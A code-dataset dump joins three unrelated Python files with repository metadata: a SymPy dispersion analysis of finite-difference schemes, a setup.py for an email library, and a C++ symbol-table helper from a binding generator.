expr_u = u_lm0_np1 - ( (2-6*mu**2)*u_lm0_nm0 + 4*mu**2*(u_lp1_nm0+u_lm1_nm0) - mu**2*(u_lp2_nm0+u_lm2_nm0) - u_lm0_nm1 )
expr_u = expr_u.subs(u_lm0_nm0,U*z**0*exp(0*I*beta*h))
expr_u = expr_u.subs(u_lm0_nm1,U*z**-1*exp(0*I*beta*h))
expr_u = expr_u.subs(u_lm0_np1,U*z**1*exp(0*I*beta*h))
expr_u = expr_u.subs(u_lm1_nm0,U*z**0*exp(-1*I*beta*h))
expr_u = expr_u.subs(u_lm1_nm1,U*z**-1*exp(-1*I*beta*h))
expr_u = expr_u.subs(u_lm1_np1,U*z**1*exp(-1*I*beta*h))
expr_u = expr_u.subs(u_lp1_nm0,U*z**0*exp(1*I*beta*h))
expr_u = expr_u.subs(u_lp1_nm1,U*z**-1*exp(1*I*beta*h))
expr_u = expr_u.subs(u_lp1_np1,U*z**1*exp(1*I*beta*h))
expr_u = expr_u.subs(u_lm2_nm0,U*z**0*exp(-2*I*beta*h))
expr_u = expr_u.subs(u_lm2_nm1,U*z**-1*exp(-2*I*beta*h))
expr_u = expr_u.subs(u_lm2_np1,U*z**1*exp(-2*I*beta*h))
expr_u = expr_u.subs(u_lp2_nm0,U*z**0*exp(2*I*beta*h))
expr_u = expr_u.subs(u_lp2_nm1,U*z**-1*exp(2*I*beta*h))
expr_u = expr_u.subs(u_lp2_np1,U*z**1*exp(2*I*beta*h))
expr_u = expr_u.subs(U,1)
expr_u.rewrite(sin)
expr_toSolve = expr_u.rewrite(sin)
expr_toSolve = expr_toSolve.subs(z,exp(I*w*k))
#expr_toSolve.evalf(subs={K:K_val,mu:mu_val,k:k_val,h:h_val,beta:50,w:380*2*np.pi})
expr_toSolve = expr_toSolve.rewrite(sin)
sols = solve(expr_toSolve,w)
## Implcit FDS:
expr_u = theta*(1/k**2)*(u_lm0_np1 - 2*u_lm0_nm0 + u_lm0_nm1) \
+ (1-theta)*0.5*((1/k**2)*(u_lp1_np1-2*u_lp1_nm0+u_lp1_nm1)+(1/k**2)*(u_lm1_np1-2*u_lm1_nm0+u_lm1_nm1)) \
+ K**2*(1/h**4)*(u_lp2_nm0 - 4*u_lp1_nm0 + 6*u_lm0_nm0 - 4*u_lm1_nm0 + u_lm2_nm0)
expr_u = expr_u.subs(u_lm0_nm0,U*z**0*exp(0*I*beta*h))
expr_u = expr_u.subs(u_lm0_nm1,U*z**-1*exp(0*I*beta*h))
expr_u = expr_u.subs(u_lm0_np1,U*z**1*exp(0*I*beta*h))
expr_u = expr_u.subs(u_lm1_nm0,U*z**0*exp(-1*I*beta*h))
expr_u = expr_u.subs(u_lm1_nm1,U*z**-1*exp(-1*I*beta*h))
expr_u = expr_u.subs(u_lm1_np1,U*z**1*exp(-1*I*beta*h))
expr_u = expr_u.subs(u_lp1_nm0,U*z**0*exp(1*I*beta*h))
expr_u = expr_u.subs(u_lp1_nm1,U*z**-1*exp(1*I*beta*h))
expr_u = expr_u.subs(u_lp1_np1,U*z**1*exp(1*I*beta*h))
expr_u = expr_u.subs(u_lm2_nm0,U*z**0*exp(-2*I*beta*h))
expr_u = expr_u.subs(u_lm2_nm1,U*z**-1*exp(-2*I*beta*h))
expr_u = expr_u.subs(u_lm2_np1,U*z**1*exp(-2*I*beta*h))
expr_u = expr_u.subs(u_lp2_nm0,U*z**0*exp(2*I*beta*h))
expr_u = expr_u.subs(u_lp2_nm1,U*z**-1*exp(2*I*beta*h))
expr_u = expr_u.subs(u_lp2_np1,U*z**1*exp(2*I*beta*h))
expr_u = expr_u.subs(U,1)
#expr_u = expr_u.subs(z,exp(I*w*k))
#sols = solve(expr_u,w) # not working ?
# # Better:
expr_u.rewrite(sin)
expr_toSolve = expr_u.rewrite(sin)
#expr_toSolve = expr_u
expr_toSolve = expr_toSolve.subs(z,exp(I*w*k))
#expr_toSolve.evalf(subs={K:K_val,mu:mu_val,k:k_val,h:h_val,beta:50,w:380*2*np.pi})
expr_toSolve = expr_toSolve.rewrite(sin)
sols = solve(expr_toSolve,w)
| [
"59313470+mariusono@users.noreply.github.com"
] | 59313470+mariusono@users.noreply.github.com |
3590fd67f1a1026d541efc28898722aa22b077ac | aa8925ae04ed5d22c54450b0fb9e7e982c915f59 | /setup.py | b79340e80deb87462a024bfa580cf918addbec90 | [
"MIT"
] | permissive | khezen/maildesk | e1e1fe64d811c7e971b4575f8cf3a82e01dcc0d7 | 03c33fcac86af9d569373367e0493f3458acbb04 | refs/heads/master | 2022-11-21T11:24:33.062901 | 2020-07-24T06:48:10 | 2020-07-24T06:48:10 | 279,969,466 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 638 | py | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="maildesk",
version="0.1.1",
author="Guillaume Simonneau",
author_email="simonneaug@gmail.com",
description="email python library",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/khezen/maildesk",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=2.7',
) | [
"simonneaug@gmail.com"
] | simonneaug@gmail.com |
58a14ee15f12ae43103a3a8bc7bc5809c4589a56 | 8af5f03574346188cba118963f205756f308c0c5 | /c2py/objects_manager.py | 64360a8538a099abc051171ffee4fad31c494f04 | [] | no_license | nanoric/c2py | 4030a03b87a0bb413f81ba0f4ff0a5407ec5d4fc | ff272c8c31d969ea8c7dbd6a904414de02f715d4 | refs/heads/master | 2023-07-21T20:48:14.457559 | 2023-07-14T06:58:13 | 2023-07-14T06:58:13 | 165,370,817 | 62 | 7 | null | 2019-10-15T06:37:20 | 2019-01-12T09:38:02 | C | UTF-8 | Python | false | false | 1,118 | py | from c2py.core.core_types.generator_types import GeneratorSymbol, GeneratorTypedef
class ObjectManager(dict):
    """Symbol table mapping fully-qualified C++ names to generator symbols.

    Lookups normalize keys by stripping any leading ``::`` root-namespace
    prefix, while assignment guards against a typedef overriding an
    already-registered concrete type (the ``typedef struct Name {} Name;``
    pattern).
    """

    @staticmethod
    def _normalize(key: str) -> str:
        # Drop every leading "::" pair so "::a::b" and "a::b" resolve alike.
        while key.startswith('::'):
            key = key[2:]
        return key

    def __setitem__(self, key: str, value: "GeneratorSymbol"):
        if not self.__contains__(key):
            super().__setitem__(key, value)
            return
        existing = self.__getitem__(key)
        if existing is None:
            # A placeholder entry may always be filled in.
            super().__setitem__(key, value)
            return
        if isinstance(value, GeneratorTypedef) and not isinstance(existing, GeneratorTypedef):
            # Special case: typedef enum/struct Name{} Name; -- keep the
            # original type rather than letting the typedef shadow it.
            return
        super().__setitem__(key, value)

    def __getitem__(self, key: str) -> "GeneratorSymbol":
        return super().__getitem__(self._normalize(key))

    def __contains__(self, key: str):
        return super().__contains__(self._normalize(key))

    def resolve_all_typedef(self, t: str):
        """Follow typedef chains until a non-typedef (or self-referential
        typedef) is reached, and return that symbol."""
        symbol = self.__getitem__(t)
        if isinstance(symbol, GeneratorTypedef) and t != symbol.target:
            return self.resolve_all_typedef(symbol.target)
        return symbol
| [
"nanoric@qq.com"
] | nanoric@qq.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.